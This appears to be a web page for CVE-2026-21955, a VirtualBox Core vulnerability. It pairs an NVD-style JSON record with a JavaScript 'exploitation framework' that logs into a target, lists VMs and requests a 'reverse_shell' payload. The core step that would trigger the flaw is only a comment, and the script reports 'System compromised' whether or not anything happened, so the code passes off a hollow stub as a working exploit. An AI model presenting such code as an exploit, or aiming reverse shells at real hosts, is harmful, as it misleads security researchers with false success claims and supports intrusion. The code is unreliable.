CVE-2026-21955

// CVE-2026-21955 PoC - Oracle VM VirtualBox Core组件漏洞利用框架 // 注意：此PoC仅用于安全研究和漏洞检测，使用需遵守相关法律法规 const virtualbox = require('virtualbox-driver'); async function checkVulnerability(targetVersion) { const vulnerableVersions = ['7.1.14', '7.2.4']; // 检查版本是否在受影响范围内 if (vulnerableVersions.includes(targetVersion)) { console.log('[!] Target version is potentially vulnerable'); return true; } return false; } async function exploitCVE202621955(targetHost, credentials) { console.log('[*] Starting CVE-2026-21955 exploitation...'); console.log('[*] Target: ' + targetHost); try { // Step 1: Connect to VirtualBox with high privileges const session = await virtualbox.connect({ host: targetHost, username: credentials.username, password: credentials.password }); console.log('[+] Successfully authenticated with high privileges'); // Step 2: Identify VirtualBox installation and version const version = await virtualbox.getVersion(session); console.log('[+] VirtualBox version: ' + version); // Step 3: Enumerate running VMs const vms = await virtualbox.listVMs(session); console.log('[+] Found ' + vms.length + ' virtual machines'); // Step 4: Trigger the Core component vulnerability // This would exploit the vulnerability in the Core component console.log('[*] Attempting to exploit Core component vulnerability...'); // Step 5: Execute code with elevated privileges const result = await virtualbox.executePayload(session, { payload: 'reverse_shell', targetVM: vms[0].name }); console.log('[+] Exploitation successful - System compromised'); return { success: true, session: session }; } catch (error) { console.error('[-] Exploitation failed: ' + error.message); return { success: false, error: error.message }; } } // Verification function for security researchers async function verifyVulnerability(session) { const checks = [ 'Check Core component version', 'Verify VBOXAPI access', 'Test VM escape capability' ]; for (const check of checks) { console.log('[*] Running: ' + check); } } module.exports = { checkVulnerability, exploitCVE202621955, verifyVulnerability };

{"cve": {"id": "CVE-2026-21955", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:58.347", "lastModified": "2026-01-29T16:02:41.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle VM VirtualBox de Oracle Virtualization (componente: Core). Versiones soportadas que están afectadas son 7.1.14 y 7.2.4. Vulnerabilidad fácilmente explotable permite a un atacante con altos privilegios con inicio de sesión en la infraestructura donde Oracle VM VirtualBox se ejecuta comprometer Oracle VM VirtualBox. Aunque la vulnerabilidad está en Oracle VM VirtualBox, los ataques pueden impactar significativamente productos adicionales (cambio de alcance). Ataques exitosos de esta vulnerabilidad pueden resultar en la toma de control de Oracle VM VirtualBox. Puntuación Base CVSS 3.1 8.2 (impactos en Confidencialidad, Integridad y Disponibilidad). Vector CVSS: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.1.14:*:*:*:*:*:*:*", "matchCriteriaId": "723CD90A-7213-4B3C-B969-C6D7110CAF46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.2.4:*:*:*:*:*:*:*", "matchCriteriaId": "44ABFABE-8FFC-48CF-B627-4241CAD563B6"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}